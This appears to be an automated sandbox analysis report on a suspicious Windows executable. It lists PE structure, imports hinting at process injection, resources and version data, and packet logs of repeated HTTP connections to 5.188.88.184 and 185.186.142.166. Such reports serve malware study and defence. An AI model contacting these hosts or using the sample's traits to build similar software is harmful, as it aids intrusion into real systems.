                                                                                                                                  je 00007FFBD09BC525h
                                                                                                                                  test eax, FF000000h
                                                                                                                                  je 00007FFBD09BC514h
                                                                                                                                  jmp 00007FFBD09BC4DFh
                                                                                                                                  lea eax, dword ptr [ecx-01h]
                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                  sub eax, ecx
                                                                                                                                  ret
                                                                                                                                  lea eax, dword ptr [ecx-02h]
                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                  sub eax, ecx
                                                                                                                                  ret
                                                                                                                                  lea eax, dword ptr [ecx-03h]
                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                  sub eax, ecx
                                                                                                                                  ret
                                                                                                                                  lea eax, dword ptr [ecx-04h]
                                                                                                                                  mov ecx, dword ptr [esp+04h]
                                                                                                                                  sub eax, ecx
                                                                                                                                  ret
                                                                                                                                  mov edi, edi
                                                                                                                                  push ebp
                                                                                                                                  mov ebp, esp
                                                                                                                                  sub esp, 20h
                                                                                                                                  mov eax, dword ptr [ebp+08h]
                                                                                                                                  push esi
                                                                                                                                  push edi
                                                                                                                                  push 00000008h
                                                                                                                                  pop ecx
                                                                                                                                  mov esi, 00413308h
                                                                                                                                  lea edi, dword ptr [ebp-20h]
                                                                                                                                  rep movsd
                                                                                                                                  mov dword ptr [ebp-08h], eax
                                                                                                                                  mov eax, dword ptr [ebp+0Ch]
                                                                                                                                  pop edi
                                                                                                                                  mov dword ptr [ebp-04h], eax

                                                                                                                                  Rich Headers

                                                                                                                                  Programming Language:
                                                                                                                                  • [ C ] VS2008 build 21022
                                                                                                                                  • [LNK] VS2008 build 21022
                                                                                                                                  • [ASM] VS2008 build 21022
                                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                                  • [RES] VS2008 build 21022
                                                                                                                                  • [C++] VS2008 build 21022

                                                                                                                                  Data Directories

                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x15da80x50.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000xe4e0.rsrc
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x132000x1c.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x150880x40.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x130000x1b0.rdata
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x117230x11800False0.609695870536data6.66032945567IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x130000x37760x3800False0.369838169643data5.20927548395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0x170000x281580x22200False0.252096211081data2.78984628836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0x400000xe4e00xe600False0.620720108696data6.12774656116IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_CURSOR0x4c1200x130dataSpanishArgentina
                                                                                                                                  RT_CURSOR0x4c2680xea8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"SpanishArgentina
                                                                                                                                  RT_CURSOR0x4d1100x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"SpanishArgentina
                                                                                                                                  RT_ICON0x406000xea8dataSpanishArgentina
                                                                                                                                  RT_ICON0x414a80x8a8dataSpanishArgentina
                                                                                                                                  RT_ICON0x41d500x6c8dataSpanishArgentina
                                                                                                                                  RT_ICON0x424180x568GLS_BINARY_LSB_FIRSTSpanishArgentina
                                                                                                                                  RT_ICON0x429800x25a8dataSpanishArgentina
                                                                                                                                  RT_ICON0x44f280x10a8dataSpanishArgentina
                                                                                                                                  RT_ICON0x45fd00x988dataSpanishArgentina
                                                                                                                                  RT_ICON0x469580x468GLS_BINARY_LSB_FIRSTSpanishArgentina
                                                                                                                                  RT_ICON0x46e380xea8dataSpanishArgentina
                                                                                                                                  RT_ICON0x47ce00x8a8dataSpanishArgentina
                                                                                                                                  RT_ICON0x485880x25a8dBase III DBT, version number 0, next free block index 40SpanishArgentina
                                                                                                                                  RT_ICON0x4ab300x10a8dataSpanishArgentina
                                                                                                                                  RT_ICON0x4bbd80x468GLS_BINARY_LSB_FIRSTSpanishArgentina
                                                                                                                                  RT_DIALOG0x4db980x9cdataSpanishArgentina
                                                                                                                                  RT_STRING0x4dc380x3cadataSpanishArgentina
                                                                                                                                  RT_STRING0x4e0080x1fadataSpanishArgentina
                                                                                                                                  RT_STRING0x4e2080x2d4dataSpanishArgentina
                                                                                                                                  RT_ACCELERATOR0x4c0900x68dataSpanishArgentina
                                                                                                                                  RT_ACCELERATOR0x4c0f80x28dataSpanishArgentina
                                                                                                                                  RT_GROUP_CURSOR0x4c2500x14dataSpanishArgentina
                                                                                                                                  RT_GROUP_CURSOR0x4d9b80x22dataSpanishArgentina
                                                                                                                                  RT_GROUP_ICON0x46dc00x76dataSpanishArgentina
                                                                                                                                  RT_GROUP_ICON0x4c0400x4cdataSpanishArgentina
                                                                                                                                  RT_VERSION0x4d9e00x1b8COM executable for DOSSpanishArgentina

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllWriteConsoleInputW, SetComputerNameExA, GetStringTypeA, OpenJobObjectA, ReadConsoleA, GetConsoleAliasA, InterlockedDecrement, GetProfileSectionA, EnumCalendarInfoExW, GetConsoleAliasesA, GetConsoleAliasesLengthA, CreateRemoteThread, SetFileTime, FindResourceExA, TerminateThread, GetLocaleInfoW, GetFileAttributesA, GetAtomNameW, GetModuleFileNameW, ReleaseSemaphore, GetLastError, GetProcAddress, GetLongPathNameA, VirtualAlloc, WriteConsoleA, LocalAlloc, DnsHostnameToComputerNameA, GetFileType, HeapLock, GetModuleFileNameA, GetDefaultCommConfigA, SetConsoleTitleW, GetModuleHandleA, GetConsoleTitleW, GetVersionExA, ReadConsoleInputW, ResetWriteWatch, CreateThread, CreateMailslotW, FileTimeToDosDateTime, HeapAlloc, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, LoadLibraryA, CreateFileA, SetStdHandle, FlushFileBuffers, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeW, GetLocaleInfoA, SetEndOfFile, GetProcessHeap, ReadFile
                                                                                                                                  USER32.dllSetCaretPos
                                                                                                                                  ADVAPI32.dllAdjustTokenGroups

                                                                                                                                  Version Infos

                                                                                                                                  DescriptionData
                                                                                                                                  ProjectVersion3.10.70.17
                                                                                                                                  InternationalNamebomgvioci.iwa
                                                                                                                                  CopyrightCopyrighz (C) 2021, fudkort
                                                                                                                                  Translation0x0129 0x0794

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  SpanishArgentina

                                                                                                                                  Network Behavior

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 11, 2022 23:38:03.334738970 CET4976580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.399087906 CET80497655.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:03.399247885 CET4976580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.399504900 CET4976580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.399583101 CET4976580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.464210033 CET80497655.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:03.517461061 CET80497655.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:03.517582893 CET4976580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.519233942 CET4976580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.583023071 CET80497655.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:03.871107101 CET4976680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.945178986 CET80497665.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:03.945322037 CET4976680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.945432901 CET4976680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:03.945455074 CET4976680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.018754959 CET80497665.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.068597078 CET80497665.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.068721056 CET4976680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.068753004 CET4976680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.099591017 CET4976780192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.142929077 CET80497665.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.166547060 CET80497675.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.166676998 CET4976780192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.166850090 CET4976780192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.166908026 CET4976780192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.233671904 CET80497675.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.286263943 CET80497675.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.286366940 CET4976780192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.286608934 CET4976780192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.316138029 CET4976880192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.355021000 CET80497675.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.391640902 CET80497685.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.391782045 CET4976880192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.391860962 CET4976880192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.391871929 CET4976880192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.470144033 CET80497685.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.521224976 CET80497685.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.521330118 CET4976880192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.521652937 CET4976880192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.553369045 CET4976980192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.597064972 CET80497685.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.620542049 CET80497695.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.620629072 CET4976980192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.620791912 CET4976980192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.621083975 CET4976980192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.688045025 CET80497695.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.688079119 CET80497695.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.740032911 CET80497695.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.740101099 CET4976980192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.740183115 CET4976980192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:04.807401896 CET80497695.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:05.084158897 CET4977180192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:05.147799015 CET80497715.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:05.147941113 CET4977180192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:05.148039103 CET4977180192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:05.148051023 CET4977180192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:05.211010933 CET80497715.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:05.256275892 CET80497715.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:05.256463051 CET4977180192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:05.264177084 CET4977180192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:05.273186922 CET4977280192.168.2.5185.186.142.166
                                                                                                                                  Jan 11, 2022 23:38:05.327631950 CET80497715.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:05.328237057 CET8049772185.186.142.166192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:05.835849047 CET4977280192.168.2.5185.186.142.166
                                                                                                                                  Jan 11, 2022 23:38:05.891144037 CET8049772185.186.142.166192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.460863113 CET4977280192.168.2.5185.186.142.166
                                                                                                                                  Jan 11, 2022 23:38:06.516129017 CET8049772185.186.142.166192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.548388004 CET4977480192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.622474909 CET80497745.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.622620106 CET4977480192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.622788906 CET4977480192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.622800112 CET4977480192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.696095943 CET80497745.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.750139952 CET80497745.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.750181913 CET80497745.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.750307083 CET4977480192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.750678062 CET4977480192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.815915108 CET4977580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.823693037 CET80497745.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.887933969 CET80497755.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.888088942 CET4977580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.888163090 CET4977580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.888411999 CET4977580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:06.960354090 CET80497755.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.027370930 CET80497755.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.027453899 CET4977580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:07.027786970 CET4977580192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:07.099375010 CET80497755.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.362636089 CET4977680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:07.435666084 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.435765028 CET4977680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:07.435899019 CET4977680192.168.2.55.188.88.184
                                                                                                                                  Jan 11, 2022 23:38:07.540493011 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540523052 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540539980 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540564060 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540585995 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540607929 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540628910 CET80497765.188.88.184192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.540631056 CET4977680192.168.2.55.188.88.184

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 11, 2022 23:38:03.017657995 CET5959653192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:03.331307888 CET53595968.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:03.545509100 CET6529653192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:03.869954109 CET53652968.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.079605103 CET6318353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:04.098866940 CET53631838.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.296652079 CET6015153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:04.315464020 CET53601518.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.533118010 CET5696953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:04.552700043 CET53569698.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:04.759929895 CET5516153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:05.082539082 CET53551618.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.529057980 CET4999253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:06.547424078 CET53499928.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:06.796454906 CET6007553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:06.815184116 CET53600758.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:07.038542032 CET5501653192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:07.361876011 CET53550168.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:10.036716938 CET6434553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:10.053680897 CET53643458.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:10.285840988 CET5712853192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:10.302181959 CET53571288.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:10.571583986 CET5046353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:10.895371914 CET53504638.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:11.227777958 CET5039453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:11.244395018 CET53503948.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:11.451437950 CET5853053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:12.477133989 CET5853053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:13.477196932 CET5853053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:15.475125074 CET53585308.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:15.486813068 CET5381353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:15.809180021 CET53538138.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:16.017404079 CET6373253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:16.033747911 CET53637328.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:16.082583904 CET5734453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:16.099036932 CET53573448.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:16.301465034 CET5445053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:16.320013046 CET53544508.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:16.514472008 CET53585308.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:16.516854048 CET5926153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:16.535861969 CET53592618.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:16.774789095 CET5715153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:16.793469906 CET53571518.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:17.067862988 CET5941353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:17.086301088 CET53594138.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:17.520761967 CET53585308.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:19.461798906 CET6051653192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:19.480447054 CET53605168.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:19.679070950 CET5164953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:19.993455887 CET53516498.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:20.219146013 CET6508653192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:20.515546083 CET53650868.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:20.747652054 CET5643253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:20.766339064 CET53564328.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:24.468498945 CET5292953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:24.485481024 CET53529298.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:24.776793957 CET6431753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:24.795237064 CET53643178.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:25.961724043 CET6100453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:25.978157997 CET53610048.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:26.240366936 CET5689553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:26.261153936 CET53568958.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:28.058054924 CET6151553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:28.076913118 CET53615158.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:28.265362024 CET5667553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:28.282282114 CET53566758.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:28.526974916 CET5717253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:28.813486099 CET53571728.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:42.787939072 CET6144653192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:42.804759026 CET53614468.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:45.434201956 CET5819953192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:45.752964973 CET53581998.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:50.110027075 CET6157353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:50.128654003 CET53615738.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:50.346180916 CET5656253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:50.362932920 CET53565628.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:50.645617008 CET5359153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:50.664134026 CET53535918.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:50.869935036 CET5968853192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:50.889480114 CET53596888.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:51.099832058 CET5603253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:51.118419886 CET53560328.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:51.353813887 CET6115053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:51.677670002 CET53611508.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:51.867629051 CET6345853192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:51.886497021 CET53634588.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:52.134732962 CET5042253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:52.456685066 CET53504228.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:55.401673079 CET5324753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:55.421308041 CET53532478.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:55.616319895 CET5854453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:55.635956049 CET53585448.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:55.854727983 CET5381453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:55.873291016 CET53538148.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:56.068715096 CET5130553192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:56.087754011 CET53513058.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:56.286040068 CET5367053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:56.304600000 CET53536708.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:56.523319006 CET5516053192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:56.542190075 CET53551608.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:56.750534058 CET6141453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:56.769058943 CET53614148.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:57.008507967 CET6384753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:57.027409077 CET53638478.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:57.240472078 CET6152353192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:57.260200977 CET53615238.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:57.490434885 CET5055153192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:57.512974024 CET53505518.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:57.973521948 CET6284753192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:57.991851091 CET53628478.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:58.205034018 CET5771253192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:58.223829031 CET53577128.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:58.669754982 CET6106453192.168.2.58.8.8.8
                                                                                                                                  Jan 11, 2022 23:38:58.688361883 CET53610648.8.8.8192.168.2.5
                                                                                                                                  Jan 11, 2022 23:38:58.881891012 CET6189153192.168.2.58.8.8.8
